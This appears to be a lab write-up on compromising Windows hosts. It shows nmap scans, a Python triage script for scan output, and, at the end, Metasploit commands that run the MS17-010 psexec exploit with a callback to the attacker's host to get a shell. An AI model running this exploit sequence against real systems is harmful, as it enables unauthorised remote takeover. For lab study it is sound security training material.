Infiltrating Windows
April 28, 2024
Last updated April 28, 2024
# Nmap 7.94 scan initiated Sat Apr 27 23:41:51 2024 as: nmap -sC -sV -oN nmap -vv 10.129.68.35
Increasing send delay for 10.129.68.35 from 0 to 5 due to 62 out of 206 dropped probes since last increase.
Increasing send delay for 10.129.68.35 from 5 to 10 due to 11 out of 13 dropped probes since last increase.
Increasing send delay for 10.129.68.35 from 10 to 20 due to 13 out of 41 dropped probes since last increase.
Nmap scan report for 10.129.68.35
Host is up, received syn-ack (0.34s latency).
Scanned at 2024-04-27 23:41:51 PST for 400s
Not shown: 990 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
7/tcp open echo syn-ack
9/tcp open discard? syn-ack
13/tcp open daytime syn-ack Microsoft Windows USA daytime
17/tcp open qotd syn-ack Windows qotd (English)
19/tcp open chargen syn-ack
80/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Windows 10 Pro 18363 microsoft-ds (workgroup: WORKGROUP)
2179/tcp open vmrdp? syn-ack
Service Info: Host: SHELLS-WIN10; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 57959/tcp): CLEAN (Couldn't connect)
| Check 2 (port 50733/tcp): CLEAN (Couldn't connect)
| Check 3 (port 25647/udp): CLEAN (Failed to receive data)
| Check 4 (port 20860/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 2h20m05s, deviation: 4h02m30s, median: 4s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-04-27T15:48:07
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 10 Pro 18363 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: Shells-Win10
| NetBIOS computer name: SHELLS-WIN10\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-04-27T08:48:08-07:00
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 27 23:48:31 2024 -- 1 IP address (1 host up) scanned in 400.77 seconds
# Nmap 7.94 scan initiated Mon Apr 29 22:08:21 2024 as: nmap -sV -O -oN nmap-os -vv 10.129.201.97
Nmap scan report for 10.129.201.97
Host is up, received echo-reply ttl 127 (0.30s latency).
Scanned at 2024-04-29 22:08:21 PST for 32s
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=4%D=4/29%OT=80%CT=1%CU=30926%PV=Y%DS=2%DC=I%G=Y%TM=662FA9F
OS:5%P=x86_64-pc-linux-gnu)SEQ(CI=I)SEQ(SP=103%GCD=1%ISR=10D%TI=I%CI=I%TS=A
OS:)SEQ(SP=103%GCD=1%ISR=10D%TI=I%CI=RD%TS=A)SEQ(SP=104%GCD=1%ISR=10C%TI=I%
OS:CI=I%II=I%SS=S%TS=A)OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4
OS:=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST11)WIN(W1=2000%W2=2000%W3=2000%W4=2
OS:000%W5=2000%W6=2000)ECN(R=N)ECN(R=Y%DF=Y%T=80%W=2000%O=M53CNW8NNS%CC=Y%Q
OS:=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=
OS:AR%O=%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T
OS:=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0
OS:%Q=)T4(R=Y%DF=Y%T=80%W=0%S=O%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z
OS:%A=O%F=AR%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=
OS:Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=O%A=O%F=R%
OS:O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80
OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=
OS:G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=N)IE(R=Y%DFI=N%T=80%CD=Z)
Uptime guess: 0.003 days (since Mon Apr 29 22:04:08 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 29 22:08:53 2024 -- 1 IP address (1 host up) scanned in 32.20 seconds
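The two reports above are easy to read by eye, but once there are more than a couple of hosts the same questions get asked every time: which ports are open and with what banner, is SMB signing enforced, is anything odd advertised. The script below is an added example, not part of the original notes and not from nmap or Metasploit: it parses nmap normal (-oN) output like the reports above, strips the REASON column that -vv adds, and turns the host-script output into short findings. SAMPLE_WIN10 and SAMPLE_SRV are trimmed, re-typed copies of the two scans so that it runs offline; the wording of the findings (NTLM relay, amplification) is mine, not nmap's.

```python
# Added example: triage helper for nmap -oN output. Not part of the original
# notes; the sample reports are trimmed copies of the two scans on this page.
import re

SAMPLE_WIN10 = """\
Nmap scan report for 10.129.68.35
PORT     STATE SERVICE      REASON  VERSION
7/tcp    open  echo         syn-ack
9/tcp    open  discard?     syn-ack
13/tcp   open  daytime      syn-ack Microsoft Windows USA daytime
17/tcp   open  qotd         syn-ack Windows qotd (English)
19/tcp   open  chargen      syn-ack
80/tcp   open  http         syn-ack Microsoft IIS httpd 10.0
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc        syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds syn-ack Windows 10 Pro 18363 microsoft-ds (workgroup: WORKGROUP)
2179/tcp open  vmrdp?       syn-ack
Host script results:
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 10 Pro 18363 (Windows 10 Pro 6.3)
"""

SAMPLE_SRV = """\
Nmap scan report for 10.129.201.97
PORT    STATE SERVICE      REASON          VERSION
80/tcp  open  http         syn-ack ttl 127 Microsoft IIS httpd 10.0
135/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
"""

# "PORT STATE SERVICE [REASON] VERSION". The REASON column only exists with
# -v/-vv, so it is stripped separately rather than assumed to be present.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
REASON = re.compile(r"^(?:syn-ack|reset|conn-refused|no-response|udp-response)(?:\s+ttl\s+\d+)?\s*")

# Ports served by the optional Windows "Simple TCP/IP Services" feature.
SIMPLE_TCPIP = {7: "echo", 9: "discard", 13: "daytime", 17: "qotd", 19: "chargen"}


def parse_ports(report):
    """One dict per port line. A trailing '?' on the service name means nmap
    guessed the service from the port number without a matching probe."""
    ports = []
    for line in report.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue
        port, proto, state, service, rest = m.groups()
        ports.append({
            "port": int(port),
            "proto": proto,
            "state": state,
            "service": service.rstrip("?"),
            "guessed": service.endswith("?"),
            "version": REASON.sub("", rest, count=1).strip(),
        })
    return ports


def smb_signing(report):
    """Classify smb2-security-mode / smb-security-mode host-script output."""
    text = report.lower()
    if "message signing enabled and required" in text:
        return "required"
    if ("message signing enabled but not required" in text
            or "message signing disabled" in text
            or "message_signing: disabled" in text):
        return "not-required"
    return "unknown"


def triage(report):
    """Short, actionable findings for one host report."""
    ports = parse_ports(report)
    notes = []
    open_tcp = {p["port"] for p in ports if p["state"] == "open" and p["proto"] == "tcp"}
    simple = sorted(open_tcp & set(SIMPLE_TCPIP))
    if simple:
        names = ", ".join(SIMPLE_TCPIP[p] for p in simple)
        notes.append(f"Simple TCP/IP Services enabled ({names}): legacy feature, "
                     "chargen/echo can be abused for traffic amplification; disable it")
    if smb_signing(report) == "not-required":
        notes.append("SMB signing not required: NTLM relay to this host is feasible")
    m = re.search(r"Potentially risky methods:\s*(.+)", report)
    if m:
        notes.append(f"Risky HTTP methods advertised: {m.group(1).strip()}")
    m = re.search(r"^\|\s+OS:\s*(.+)$", report, re.MULTILINE)
    if m:
        notes.append(f"OS from smb-os-discovery: {m.group(1).strip()}")
    for p in ports:
        if p["guessed"] and p["state"] == "open":
            notes.append(f"{p['port']}/{p['proto']} {p['service']} is a port-number guess; "
                         "confirm it by hand (e.g. ncat to the port)")
    return notes


if __name__ == "__main__":
    for host, rep in (("10.129.68.35", SAMPLE_WIN10), ("10.129.201.97", SAMPLE_SRV)):
        print(f"== {host}")
        for p in parse_ports(rep):
            print(f"  {p['port']:>5}/{p['proto']} {p['service']:<13} {p['version']}")
        for n in triage(rep):
            print("  !", n)
```

To run it against a real scan, replace the sample string with the contents of the -oN file (open(path).read()). Note that the second host yields no findings from this script at all: the only thing it exposes is a 2008 R2 - 2012 SMB banner, so whether it is actually exploitable has to be established by a vulnerability check rather than by the banner alone.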
HERE IS THE ANSWER
I just have to use psexec instead of uploading a reverse shell through the web server.
search eternal
use exploit/windows/smb/ms17_010_psexec
options
set rhosts 10.129.201.97
set lhost 10.10.15.241
run
(search eternal listed exploit/windows/smb/ms17_010_psexec as result 1, so use 1 selects the same module)